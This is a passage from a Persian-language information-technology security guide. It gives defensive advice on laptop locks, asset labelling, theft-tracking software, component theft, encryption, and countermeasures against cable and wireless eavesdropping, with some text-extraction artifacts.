ﻛﺎﺑﻠﻲ ﺧﺮﻳﺪ ﻛﻪ ﺷﻴﺎﺭ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔﻲ ﺭﺍ ﺑﻪ ﺍﺷﻴﺎﺀ ﻧﺰﺩﻳﻚ ﺁﻥ ﻗﻔﻞ ﻣﻲﻛﻨﺪ .ﺍﮔﺮ ﺩﺳﺘﮕﺎﻩ ﺑﻪ ﺟﺎﻳﻲ ﻗﻔﻞ ﺷﻮﺩ ﻧﻤﻲﺗـﻮﺍﻥ ﺑـﺪﻭﻥ ﺩﺍﺷـﺘﻦ
ﻛﻠﻴﺪ ﻳﺎ ﺁﺳﻴﺐ ﺭﺳﺎﻧﺪﻥ ﺑﻪ ﺩﺳﺘﮕﺎﻩ ﺁﻧﺮﺍ ﺑﺎﺯ ﻛﺮﺩ ،ﻭ ﺩﺭﺻﻮﺭﺕ ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻫﻢ ﻓﺮﻭﺵ ﻣﺠﺪﺩ ﺁﻥ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺧﻮﺍﻫﺪ ﺷـﺪ .ﺍﻳﻨﮕﻮﻧـﻪ
ﻗﻔﻠﻬﺎ ﺑﻴﺸﺘﺮ ﻣﺎﻧﻊ ﻗﺎﭘﻴﺪﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺗﻮﺳﻂ ﺩﺯﺩﻫﺎﻱ ﺧﻴﺎﺑﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ.
ﺑﺮﭼﺴﺐﺯﺩﻥ
ﻳﻚ ﺭﺍﻩ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺍﻣﻜﺎﻥ ﺳﺮﻗﺖ ﻭ ﺍﻓﺰﺍﻳﺶ ﺍﺣﺘﻤﺎﻝ ﺑﺎﺯﭘﺲ ﻓﺮﺳﺘﺎﺩﻥ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔﻲ ،ﺣﻜﺎﻛﻲ ﻧﺎﻡ ﻭ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻦ ﻳﺎ ﺑﺮﭼـﺴﺐ ﺯﺩﻥ
ﺭﻭﻱ ﺁﻥ ﺗﻮﺳﻂ ﺑﺮﭼﺴﺐﺯﻧﻬﺎﻱ ﺛﺎﺑﺖ ﻳﺎ ﻧﻴﻤﻪﺛﺎﺑﺖ ﺍﺳﺖ .ﻭﺟﻮﺩ ﺍﻳﻦ ﺑﺮﭼﺴﺒﻬﺎ ،ﺍﺩﻋﺎﻱ ﻋﺪﻡ ﺍﻃﻼﻉ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻳـﺎ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺍﺯ ﻣـﺴﺮﻭﻗﻪ
ﺑﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﻣﻲﻛﻨﺪ.
ﺑﺮﭼﺴﺒﻬﺎﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﺯﻧﻲ ﺧﻮﺏ ﺑﻪ ﻭﺿﻮﺡ ﻗﺎﺑﻞ ﺭﺅﻳﺖ ﻫﺴﺘﻨﺪ ﻭ ﺷﻤﺎﺭﺓ ﺳﺮﻱ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻮﺟﺐ ﻣﻲﺷـﻮﺩ ﺳـﺎﺯﻣﺎﻥ
ﺑﺘﻮﺍﻧﺪ ﻣﺸﺨﺼﺎﺕ ﺁﻧﺮﺍ ﺭﺩﻳﺎﺑﻲ ﻛﻨﺪ .ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﮔﺬﺍﺭﻱ ﻛﻢﻫﺰﻳﻨﻪ ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺖ ﺭﺩﻳﺎﺑﻲ ﺍﻣﻦ ﻭﺳﺎﻳﻞ ﺩﻓﺘـﺮﻱ ) ٥٨(STOPﺗﻮﻟﻴـﺪ
ﺷﺪﻩ ﺍﺳﺖ .ﺑﻪ ﺍﻳﻦ ﺑﺮﭼﺴﺒﻬﺎ ﺷﻤﺎﺭﺓ ﺳﺮﻱ ﺍﺧﺘﺼﺎﺻﻲ ﺗﻌﻠﻖ ﮔﺮﻓﺘﻪ ﻭ ﺑﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ۳ﺳﺎﻟﻪ ﺩﺭ ﺍﺭﻭﭘﺎ ،ﺍﺳﺘﺮﺍﻟﻴﺎ ،ﺁﻣﺮﻳﻜﺎﻱ ﻻﺗـﻴﻦ ،ﻭ ﺁﻣﺮﻳﻜـﺎﻱ
ﺷﻤﺎﻟﻲ ﻫﻤﺮﺍﻩ ﺍﺳﺖ .ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻗﻄﻌﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺑﺎ ﺑﺮﭼﺴﺐ STOPﭘﻴﺪﺍ ﺷﻮﺩ ،ﺷﺮﻛﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺗﻴﺒﻲ ﺑﺪﻫﺪ ﻛـﻪ ﺑـﻪ ﻣﺎﻟـﻚ ﺍﺻـﻠﻲ
ﺑﺎﺯﮔﺸﺖ ﺩﺍﺩﻩ ﺷﻮﺩ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺧﺪﻣﺎﺕ ﺗﺮﻣﻴﻢ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ
ﺍﻣﺮﻭﺯﻩ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺑﺮﺍﻱ "ﺭﺩﻳﺎﺑﻲ" ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﺎﻧﻨﺪ .ﺑﺮﻧﺎﻣﺔ ﺭﺩﻳـﺎﺑﻲ ﺩﺭ ﻗـﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠـﻒ
ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﭘﻨﻬﺎﻥ ﻣﻲﺷﻮﺩ ﻭ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻳﻚ ﺗﻤﺎﺱ ﺑﺎ ﺳﺮﻭﻳﺲ ﺭﺩﻳﺎﺑﻲ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﺪ ﺗﺎ ﻣﺤﻞ ﺧﻮﺩ ﺭﺍ ﺍﻋﻼﻡ ﻛﻨﺪ .ﺍﻳﻦ ﺗﻤﺎﺱ ﻣﻤﻜﻦ
)Secure Tracking of Office Property (http://www.stoptheft.com
58
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٢٨٧
ﻻ ﺍﺯ ﺍﻳﻦ ﺗﻤﺎﺳﻬﺎ ﺻﺮﻓﻨﻈﺮ ﻣﻲﺷﻮﺩ ،ﺍﻣـﺎ ﭼﻨﺎﻧﭽـﻪ ﺭﺍﻳﺎﻧـﻪ ﻛﻴﻔـﻲ ﺩﺭ
ﺍﺳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺧﻂ ﺗﻠﻔﻦ ﻭ ﻳﺎ ﻳﻚ ﺍﺗﺼﺎﻝ ﺷﺒﻜﻪ ﺑﺎﺷﺪ .ﻣﻌﻤﻮ ﹰ
ﻣﺮﻛﺰ ﺳﺮﻭﻳﺲ ﺭﺩﻳﺎﺑﻲ ﺑﻌﻨﻮﺍﻥ "ﺩﺯﺩﻳﺪﻩﺷﺪﻩ" ﺑﻪ ﺛﺒﺖ ﺭﺳﻴﺪﻩ ﺑﺎﺷﺪ ،ﭘﻠﻴﺲ ﺩﺭ ﺟﺮﻳﺎﻥ ﻣﺤﻞ ﻣﺤﻤﻮﻟﻪ ﺩﺯﺩﻱ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ.
ﺍﻟﺒﺘﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺭﻭﻣﻴﺰﻱ ﻫﻢ ﻣﺜـﻞ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻛﻴﻔـﻲ ﻛـﺎﺭ ﻣـﻲﻛﻨﻨـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺷـﻤﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ
ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﻣﺨﺎﻃﺮﺓ ﺑﺎﻻﻳﻲ ﺑﺮﺍﻱ ﺩﺯﺩﻳﺪﻩﺷﺪﻥ ﺩﺍﺭﻧﺪ ﺑﺪﻳﻨﺼﻮﺭﺕ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ.
ﺳﺮﻗﺖ ﺍﺟﺰﺍﺀ
ﺯﻣﺎﻧﻴﻜﻪ ﻗﻴﻤﺖ RAMﺑﺎﻻ ﺑﻮﺩ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﺍﺯ ﺩﺯﺩﻳﻬـﺎﻱ ﻣﺘـﻮﺍﻟﻲ RAMﺭﻧـﺞ ﻣـﻲﺑﺮﺩﻧـﺪ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ ﻭ
ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﺎﻫﺪ ﺩﺯﺩﻳﻬﺎﻱ ﺑﺰﺭﮒ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﭘﻴﺸﺮﻓﺘﻪ ﺑﻮﺩﻩﺍﻧﺪ RAM .ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﺁﺧﺮﻳﻦ ﻣـﺪﻝ ﺑﺮﺍﺣﺘـﻲ ﺩﺭ ﺑـﺎﺯﺍﺭ
ﺁﺯﺍﺩ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ .ﺍﻳﻦ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺭﺩﻳﺎﺑﻲ ﻫﺴﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﺎﺭﻗﻴﻦ ﺗﻨﻬـﺎ ﻗـﺴﻤﺘﻲ ﺍﺯ RAMﺩﺍﺧـﻞ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ
ﻣﻲﺩﺯﺩﻧﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻔﺘﻪﻫﺎ ﻳﺎ ﻣﺎﻫﻬﺎ ﺑﮕﺬﺭﺩ ﺗﺎ ﻣﻮﺿﻮﻉ ﺁﺷﻜﺎﺭ ﺷﻮﺩ .ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺷﻜﺎﻳﺖ ﻛﻨﺪ ﻛﻪ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﻧﺎﮔﻬـﺎﻥ ﺑـﺴﻴﺎﺭ
ﺁﻫﺴﺘﻪﺗﺮ ﺍﺯ ﺁﻧﭽﻪ ﺩﻳﺮﻭﺯ ﻛﺎﺭ ﻣﻲﻛﺮﺩ ﻛﺎﺭ ﻣﻲﻛﻨﺪ RAM ،ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ،ﻭ ﺳﭙﺲ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳـﺎ caseﺁﻥ ﺍﺯ ﺍﻳﻤﻨـﻲ ﻓﻴﺰﻳﻜـﻲ
ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﻳﺎ ﻧﻪ.
ﺭﻣﺰﮔﺬﺍﺭﻱ
ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ ﺑﺎﺷﺪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺩﺭ ﺭﺍﺳﺘﺎﻱ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺍﻫﺪﺍﻑ ﺻﺎﺣﺐ ﺟﺪﻳﺪ ﺭﺍﻳﺎﻧﻪ ﺑﻜﺎﺭ ﺧﻮﺍﻫـﺪ
ﺭﻓﺖ .ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﭘﺎﻙ ﻛﻨﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﻨﺪ .ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻓﺮﻭﺵ ﺑﺮﺳﺪ ،ﻳﺎ ﺩﺭ ﻧﺎﻣـﻪﭘﺮﺍﻛﻨـﻲﻫـﺎﻱ
ﺑﺪﻧﺎﻡ ﻛﻨﻨﺪﻩ ﻭ ﻳﺎ ﺩﺭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺎﻳﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻜﺎﺭ ﺭﻭﺩ.
ﻼ ﺩﻭﺭ ﻧﮕﻪ ﺩﺍﺷﺖ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ ﺭﺍ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻲﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ؛ ﺑﺮﺍﻱ ﺍﻳـﻦ
ﻫﻴﭽﮕﺎﻩ ﻧﻤﻲﺗﻮﺍﻥ ﭼﻴﺰﻱ ﺭﺍ ﺍﺯ ﺳﺮﻗﺖ ﻛﺎﻣ ﹰ
ﻣﻨﻈﻮﺭ ﮐﺎﻓﻲ ﺍﺳﺖ ﺩﺳﺘﮕﺎﻩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷﺪ ﻭ ﺳﺎﺭﻕ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﻧﺪﺍﻧﺪ .ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ،ﺣﺘﻲ ﺑﺎ ﺑﻬﺘـﺮﻳﻦ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﺍﻣﻨﻴـﺖ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺑﺎﺯﺩﺍﺭﻧﺪﻩﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ،ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻧﻈﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻪ ﺷﻜﺴﺘﻦ ﺁﻥ ﻣـﺸﻜﻞ ﺑﺎﺷـﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ
ﺷﻮﻧﺪ .ﺗﻮﺻﻴﻪ ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻗﻮﻱ ﺍﺳﺖ ﺗﺎ ﺣﺘﻲ ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﺗﺎﻥ ﺑﻪ ﺳـﺮﻗﺖ ﺭﻓـﺖ ،ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺳﻲ ﻛـﻪ ﺩﺭ ﺁﻥ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺮﺍﺣﺘﻲ ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺳﻮﺀ ﻭﺍﻗﻊ ﻧﺸﻮﺩ.
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ
ﺍﺳﺘﺮﺍﻕﺳﻤﻊ )ﺷﻨﻮﺩ(
ﺷﺎﻳﺪ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻜﻲ ﺍﺯ ﺷﻮﻡﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﺍﻧﺘﺸﺎﺭ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺩﺍﺩﻩﻫﺎ ﺑﺎﺷﺪ .ﺣﺘﻲ ﺑﺎ ﻣﻌﻤـﻮﻟﻲﺗـﺮﻳﻦ ﺗﺠﻬﻴـﺰﺍﺕ ،ﺍﺳـﺘﺮﺍﻕﺳـﻤﻊ
ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺭﻭﻧﻮﺷﺖ ﻛﺎﻣﻞ ﺍﺯ ﺍﻗﺪﺍﻣﺎﺕ ﻗﺮﺑﺎﻧﻲ -ﻓﺸﺮﺩﻩﺷﺪﻥ ﻫﺮ ﺩﻛﻤﻪ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﻭ ﻫـﺮ ﻗﻄﻌـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺭﻭﻱ ﺻـﻔﺤﺔ
ﻻ ﻗﺮﺑـﺎﻧﻲ ﺍﺯ ﺣـﻀﻮﺭ ﻣﻬـﺎﺟﻢ
ﻧﻤﺎﻳﺸﮕﺮ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ ﻳﺎ ﺑﻪ ﭼﺎﭘﮕﺮ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ -ﺭﺍ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻛﻨﺪ .ﺩﺭ ﺍﻳﻦ ﻣﻴـﺎﻥ ﻣﻌﻤـﻮ ﹰ
ﺑﻲﺍﻃﻼﻉ ﺍﺳﺖ ﻭ ﺧﻮﺵﺑﺎﻭﺭﺍﻧﻪ ﺑﻪ ﻛﺎﺭ ﺧﻮﺩ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻭ ﻧﻪ ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺑﻠﻜﻪ ﻫﻤﭽﻨﻴﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﻣﺨﺘﻠـﻒ
ﻛﺴﺐ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﻣﻌﺮﺽ ﺳﺮﻗﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻫﻤﭙﻮﺷﺎﻧﻲ ﺯﻳﺎﺩﻱ ﻣﻴﺎﻥ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺩﻩﻫﺎﻳﺘـﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﺍﺯ ﻫﻤـﺔ
ﺍﻳﻨﻬﺎ ﮔﺬﺷﺘﻪ ﺍﮔﺮ ﻛﺴﻲ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﺭﺍ ﺑﺪﺯﺩﺩ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺁﻧـﺮﺍ ﻧﻴـﺰ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺩﺍﺩﻩﻫـﺎﻱ ﺷـﻤﺎ ﺩﺭ ﻣﻌـﺮﺽ ﺣﻤـﻼﺕ
ﮔﻮﻧﺎﮔﻮﻧﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻗﺪﺍﻣﺎﺕ ﻓﻴﺰﻳﻜﻲ ﻛﻪ ﺩﺭ ﻗﺴﻤﺘﻬﺎﻱ ﻗﺒﻠﻲ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪ ﺭﺍ ﺑﻲﺍﺛﺮ ﻛﻨﻨﺪ.
٢٨٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻒ ﺭﺍﻳﺎﻧﻪ -ﺍﺗﺼﺎﻝ ﻣﻴﺎﻥ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻭ ﺭﺍﻳﺎﻧﻪ ،ﻛﺎﺑﻠﻬﺎ ﻭ ﺳﻴﻢﻛﺸﻲﻫـﺎﻱ ﺩﺍﺩﻩﻫـﺎ ،ﺷـﺒﻜﻪﻫـﺎﻱ
Ethernetﻭ ﻓﻴﺒﺮﻧﻮﺭﻱ ،ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ،ﻭ ﺣﺘﻲ ﺍﻣﻮﺍﺝ ﺭﺍﺩﻳﻮﻳﻲ ﮔﺬﺭﻧﺪﻩ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ -ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺩﺷـﻮﺍﺭ
ﻛﺮﺩﻥ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
•
ﻛﺎﺑﻠﻬﺎ ﻭ ﺳﻴﻤﻬﺎﻱ ﺣﺎﻣﻞ ﺩﺍﺩﻩ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺧﺮﺍﺑﻲ ﻳﺎ ﺗﻐﻴﻴﺮﺍﺕ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﻃﻮﺭ ﻣﻨﻈﻢ ﺑﺎﺯﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺑـﻞ ﭘﻮﺷـﺶﺩﺍﺭ ﻳـﺎ
ﻣﺴﻠﺢ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭﺗﺮ ﻛﺮﺩﻥ ﺍﻳﺠﺎﺩ ﻣﻨﻔﺬ ﺩﺭ ﺳﻴﻤﻬﺎ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﮔﺮ ﺑﻪ ﺍﺻﻮﻝ ﺍﻣﻨﻴﺘﻲ ﺧﻴﻠﻲ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻴﺪ ،ﻛﺎﺑﻠﻬـﺎ ﺭﺍ
ﺩﺭ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻓﻮﻻﺩﻱ ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
•
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﻓﺎﺗﺮ ﻏﻴﺮ ﻓﻌـﺎﻝ ،ﭘﻮﺭﺗﻬـﺎﻱ Ethernetﻓﻌـﺎﻝ ﻧﺪﺍﺭﻧـﺪ .ﺑﺠـﺎﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ hubﻫـﺎﻱ ،Ethernetﺍﺯ
ﺳﻮﺋﻴﭽﻬﺎﻱ Ethernetﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﻨﺘﺮﻝ ﺷﺒﮑﺔ ﻣﺤﻠﻲ ﻣﺎﻧﻨﺪ arpwatchﻛﻪ ﺑﺴﺘﻪﻫﺎﻱ ﺑﺎ ﺁﺩﺭﺱ MAC
ﺑﺪﻭﻥ ﺳﺎﺑﻘﺔ ﻗﺒﻠﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻛﻨﺪ ،ﻳﺎ ﺍﺯ ﺳﻮﺋﻴﭽﻬﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺁﺩﺭﺱ MACﺑﺴﺘﻪﻫﺎ ﺭﺍ ﻏﺮﺑـﺎﻝ ﻛﻨﻨـﺪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﻤﺎﻳﻴﺪ .ﻫﺮﺟﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺑﺠﺎﻱ ﻛﺎﺑﻠﻬﺎﻱ ﻣﺴﻲ ،ﺍﺯ ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮ ﻧﻮﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﭼﻮﻥ ﺍﻳﺠﺎﺩ ﻣﻨﻔﺬ ﻣﺨﻔـﻲ ﺩﺭ ﺁﻧﻬـﺎ ﻣـﺸﻜﻠﺘﺮ
ﺍﺳﺖ.
•
ﺍﺯ ﺑﻜﺎﺭ ﺑﺮﺩﻥ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ .ﺍﮔﺮ ﺣﺘﻤﹰﺎ ﺑﺎﻳﺪ ﻳﻚ ﺷﺒﻜﻪ ﺑﻲﺳﻴﻢ ﺑﺴﺎﺯﻳﺪ ،ﺗﻤﺎﻡ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻤﻨﻲ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺩﻓﺎﻉ
ﺩﺭ ﻋﻤﻖ )ﻣﺜﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ،ﺩﻳﻮﺍﺭﻩ ﺁﺗﺶ ،٦٠ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﭘﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ،٦١SSIDﺻﺎﻓﻲﻫﺎﻱ ،MACﻭ (...ﺭﺍ ﺩﺭ ﺁﻥ ﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ
ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺍﻳﻤﻨﻲ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ ،ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻣﻮﺯﺵ ﺩﻫﻴﺪ ﺩﺭ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﻫﻤﻴـﺸﻪ ﺍﺯ VPNﻳـﺎ ﺳـﺎﻳﺮ
ﺗﻮﻧﻠﻬﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺑﻲﺳﻴﻢ ٦٢ﺭﺍ ﺧﺎﺭﺝ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ )ﻳﺎ ﻣﻴﺎﻥ ﺩﻭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ( ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
